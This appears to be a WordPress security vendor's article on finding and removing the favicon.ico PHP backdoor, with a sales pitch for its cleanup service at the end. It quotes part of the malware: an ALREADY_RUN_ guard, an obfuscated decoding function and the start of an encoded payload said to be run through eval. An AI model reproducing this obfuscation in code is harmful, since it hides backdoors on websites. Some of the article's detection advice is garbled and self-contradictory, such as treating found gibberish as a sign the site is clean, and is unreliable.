How To Remove Favicon .ico Virus Backdoor in WordPress?

WordPress ico hack

Remove favicon ico virus backdoor hack from wordpress

Do you think that your site has spam or it is ranking high for unlawful items? Favicon.ico exploit could be the reason behind it.

With the favicon.ico virus, your site can be easily hacked by injecting malicious ico files in wordpress.

Hacker can easily inject malicious ico php backdoor files to your online server and deface your website. This can result in Google blacklisting and web host suspension. Read more about WordPress PHP backdoor

A WordPress ico backdoor, can lead to a decrease in website traffic, revenue will drop and it can have negative impact on your site SEO ranking

The blessed ones will receive the notification from the web host that the site is infected and will also send the details through email.

What to do if your wordpress site is infected with Favicon.ico malware?

Fortunately, In this article you will learn more about how to detect & remove Favicon.ico virus in your WordPress site.

Run a WordPress malware scan for your site to detect the malware and clean it instantly. Let us remove favicon ico malware in no time!

What is Favicon.ico Virus?

The favicon (.ico) virus creates a favicon.ico or random .ico file containing a malicious PHP code inside them.

ico hack can be used to perform dangerous actions in WordPress sites such as :

Before discussing it, this is important to know about what is a favicon. It is tiny icons that appear on the browser tab and aside from the site name.

ICO is the same as PNG; these are the image file format. If you want favicon to appear then the browser utilizes PNG or ICO Files.

Let’s shift our focus on favicon.ico malware. To use your website, hackers make use of security vulnerabilities in WordPress.

After they get to enter, they make malevolent documents by the name of favicon.ico. These documents have a random name and words like favicon_bdjl23.ico.

The hackers can form random files like HTML file but they will name it with .ico. While scrolling, if you find a file name with .ico than it doesn’t mean that it is an image.

Hackers perform usual action to infuse virus. Let’s check these actions:

  • They will harm your files by adding malevolent codes. Along with it, they will also form some other files and spread them to different locations.
  • With the help of these documents, they will spam the server of your website.
  • They can get all the information about your visitor and even run the phishing scripts.
  • They can covey encrypted information with the help of covered Favicon files that can be illegal.
  • Download the spyware to get all the critical information.
  • After having access, these hackers can attract the users to install the malevolent files on to their laptops.
  • To get easy access again on your website, they will form another account as an admin.
  • Even if you find out a new account then they have another way to enter the site. They create a back gate to your site to enter.

How to Detect & Find the Favicon ICO Virus?

The virus is not displayed clearly as the hackers hide these malevolent files. Along with it, they will infect the content so that the malevolent scripts can easily be transferred through documents or folders.

You can detect the Favicon virus through a plug-in or even manually. If you opt for the manual way then this is a bit dangerous because the favicon virus prevails deep inside into your documents. Manually, you can’t perform quickly as compared with the plug-in.

After you are clear that the site includes a favicon virus then it is important to remove all the infection as quickly as possible. So, use the plug-in as it is more effective than the manual method.

Wordpress Malware Scanner Free Online Security

  • To search for all the .ico files, you have to scan your entire website.
  • After finding them, download the files on your PC and rename the file from .ico to .txt.
  • After changing the file name, open them and then scan the PHP code for all the files. And, there is any file with.PHP extension; it means that the virus is still there.
  • After this, scan the entire document.
  • If you find the gibberish words then the problem will be fixed and your site has no virus.


ico backdoor in WordPress

Diagnosing Favicon.ico Malware

You will find the function like “rxjdqbd”. For the function, a string is utilized to translate it and base64 encoded code is infused. The function then utilizes the translation regulations to go from one to another parameter. This will provide you the end results by decoding the base64 code that can be carried out.

After this, the malware announces the associative array with the translation key characters. With the help of function, you can run all the malevolent scripts.


  • Creation of Rogue Admin User in CMS
  • Spyware
  • Patches xmlrpc.php – Read more : How to Disable XML-RPC in WordPress?
  • Spammy files are created

Favicon/Bak.Bak malware

  • This malware checks for a semaphore with a prefix “ALREADY_RUN_” with the following lines of malicious code:

if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718')){ define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

  • Thereafter, a randomly named function is declared, in this case, “rxjdqbd”. This function contains a base64 encoded code and a string to translate that. This function then uses the translation rules from the first parameter into the second one. It results in a base64 decoded code which can be executed.
  • At last, the malware declares associative array along with its translation key characters. Then, the eval function is called to run the malicious script.

How to remove Favicon ico hack from WordPress?

  • Search for all the files with the code .ico and then delete them.
  • Pull out from index.php all the harmful codes that have all malevolent documents.

If you also find your website to be behaving crazy, follow these steps to remove the malware:

  • Make a copy of these files and change their extension from .ico to .txt. So, for example, a file abc.ico would now become abc.txt.
  • Scan all icon files on your server. This can be done using the grep command: grep -r -i –include=*.ico ./
  • Open these text files ones by one and look for any PHP code. Delete the infected .ico files.

Code Dump


if (!defined('ALREADY_RUN_1bc29b36f342a82aaf6658785356718'))


define('ALREADY_RUN_1bc29b36f342a82aaf6658785356718', 1);

$zqhlhv = 1056; function rxjdqbd($cdfuc, $attkkyxjmu){$wfdjzocv = ''; for($i=0; $i < strlen($cdfuc); $i++){$wfdjzocv .= isset($attkkyxjmu[$cdfuc[$i]]) ? $attkkyxjmu[$cdfuc[$i]] : $cdfuc[$i];}

$udaib="rawurl" . "decode";return $udaib($wfdjzocv);}

$yoyqluklu = '%2J%2u%2J%2u%T2606_Cre%nF%nQrNNLN_oLS%nQ%n1%n2qpWW%nP%aD%2J%'.


One can find a number of ways to infect the site and while inspecting the Favicons, there are tons of sites infected.

While surfing the site, if there is any problem, find some irrelevant files or have .bak.bak file then quickly clear all the infection from your website.

How to Protect Your site From Favicon.ico Malware?

You need to find the vulnerability that lead to hacked WordPress site in the first place and seal it.

  • Use a security plugin and regularly perform virus scan on your website.
  • Make sure your WordPress version is updated to the latest version.
  • Update all themes and plugins to the latest version & periodically
  • If you’ve installed any pirated or cracked software, delete it immediately and scan your wordpress theme for malware

Once done, we’re confident your website is secure from WordPress Favicon.ico hack.

24/7 WP Security & Malware Removal
Is your site hacked or infected with malware? Let us get it fixed for you
Secure My Website(s)